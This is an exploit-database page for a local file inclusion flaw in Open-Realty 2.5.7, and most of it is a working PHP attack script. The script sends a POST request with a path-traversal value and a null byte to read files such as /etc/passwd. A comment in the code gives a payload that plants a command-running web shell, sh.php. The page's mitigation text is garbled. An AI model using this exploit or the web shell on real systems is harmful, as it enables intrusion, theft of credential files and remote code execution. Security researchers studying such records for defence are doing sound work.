Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
LFI in Open-Realty - exploit.company
header-logo
Suggest Exploit
vendor:
Open-Realty
by:
Nikola Petrov
7.5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: Open-Realty
Affected Version From: 2.5.2007
Affected Version To: 2.5.2007
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2010

LFI in Open-Realty

This exploit allows an attacker to include arbitrary files on the server, leading to potential information disclosure or code execution.

Mitigation:

Upgrade to a patched version of Open-Realty or apply a fix provided by the vendor. Additionally, ensure that MAGIC_QUOTES is enabled and is properly escaped or replaced with \0.
Source

Exploit-DB raw data:

<?php
/*
 * Exploit Title: 
 * Date: 2010-08-18
 * Author: Nikola Petrov
 * Vendor: http://open-realty.org/
 * Version: 2.5.7
 */
	/*
		vulnerable: Open-Realty 2.5.7
		LFI: /index.php
		
		upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>
		include the image and sh.php will be generated.
		proceed with sh.php

		MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
	*/

	print "\n\n#########################################################################\n";
	print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
	print "#Date: 05.09.2009\n";
	print "#########################################################################\n\n";

	if($argc < 5) {
		print "usage: $argv[0] host port path file [debug: 1/0]\n";
		print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
		exit();
	}

	$Host = $argv[1];
	$Port = $argv[2];
	$Path = $argv[3];
	$File = $argv[4];

	function HttpSend($aHost, $aPort, $aPacket) {
		$Response = "";

		if(!$Socket = fsockopen($aHost, $aPort)) {
			print "Error connecting to $aHost:$aPort\n\n";
			exit();
		}
		
		fputs($Socket, $aPacket);
		
		while(!feof($Socket)) $Response .= fread($Socket, 1024);
		
		fclose($Socket);
		
		return $Response;
	}

	$VulnRequest = "select_users_lang=". $File . "%00";
	
	$Packet  = "POST {$Path} HTTP/1.1\r\n";
	$Packet .= "Host: {$Host}\r\n";
	$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";
	$Packet .= "$VulnRequest\n";

	if($argv[5] == 1) print $Packet;

	print HttpSend($Host, $Port, $Packet);
?>

Navigation

Suggest Exploit

Services By CQR